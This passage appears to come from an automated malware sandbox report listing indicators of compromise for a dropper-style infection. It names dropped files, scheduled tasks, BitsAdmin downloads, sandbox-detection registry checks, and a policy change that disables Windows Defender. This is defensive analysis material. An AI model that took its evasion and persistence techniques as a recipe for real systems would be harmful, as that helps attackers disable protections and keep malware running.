C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\IuWtIecd.dll MicrosoftEdgeCP.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.7916 lighteningplayer-cache-gen.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe AAsjqRognrs5OHbgENK9auj7.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI9218.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI51A0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8D60.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI53B4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI92E5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9EF5.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI79D1.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\f7bc874.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9C42.tmp msiexec.exe File created C:\Windows\Installer\f7bc877.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI5442.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4CEC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI54FE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI91D9.tmp msiexec.exe File created C:\Windows\Installer\f7bc874.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9B25.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIDFCA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8EC9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI916B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI9296.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI8B9A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDAF5.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI7839.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI86B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9050.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8FB4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI99EB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9CA1.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI9C12.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9B64.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI7944.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI90EE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
pid pid_target Process procid_target 4288 1520 WerFault.exe 91 4816 1652 WerFault.exe 95 5068 1520 WerFault.exe 91 4828 1520 WerFault.exe 91 4672 1520 WerFault.exe 91 4580 1520 WerFault.exe 91 5980 1520 WerFault.exe 91 4872 2392 WerFault.exe 139 4892 1520 WerFault.exe 91 4496 5284 WerFault.exe 163 3896 2392 WerFault.exe 139 7028 2392 WerFault.exe 139 4484 2392 WerFault.exe 139 4996 5192 WerFault.exe 169 6380 5656 WerFault.exe 197 3344 5656 WerFault.exe 197 5540 2392 WerFault.exe 139 -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5592 schtasks.exe 7364 schtasks.exe 7356 schtasks.exe 7260 schtasks.exe 7224 schtasks.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 7020 bitsadmin.exe 5528 bitsadmin.exe -
Kills process with taskkill 12 IoCs
pid Process 7208 taskkill.exe 7264 taskkill.exe 4388 taskkill.exe 8140 taskkill.exe 5600 taskkill.exe 5592 taskkill.exe 4512 taskkill.exe 5368 taskkill.exe 4900 taskkill.exe 8908 taskkill.exe 4916 taskkill.exe 6364 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cscript.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}User rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}User rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}USER rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{A8CDDE19-3402-437B-BB7D-049970CEB656}USER rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{J4ZPT3Z1-W6KY-VVT4-W36K-U3VX5NTXVQUQ} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "893" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\ = "1059" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "580" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stocks.etoro.com\ = "350" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local 